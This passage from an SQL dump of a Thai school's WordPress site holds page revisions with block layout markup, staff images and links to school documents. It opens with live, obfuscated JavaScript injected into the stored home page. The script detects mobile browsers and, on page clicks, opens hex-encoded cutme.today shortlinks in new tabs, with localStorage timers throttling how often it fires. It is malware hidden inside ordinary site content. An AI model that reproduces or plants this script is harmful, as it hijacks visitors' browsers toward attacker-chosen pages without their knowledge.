)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 10:31:43','2025-07-15 03:31:43','',19,'http://watprato.ssk.in.th/?p=668',0,'revision','',0),
(669,1,'2025-07-15 10:33:57','2025-07-15 03:33:57','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 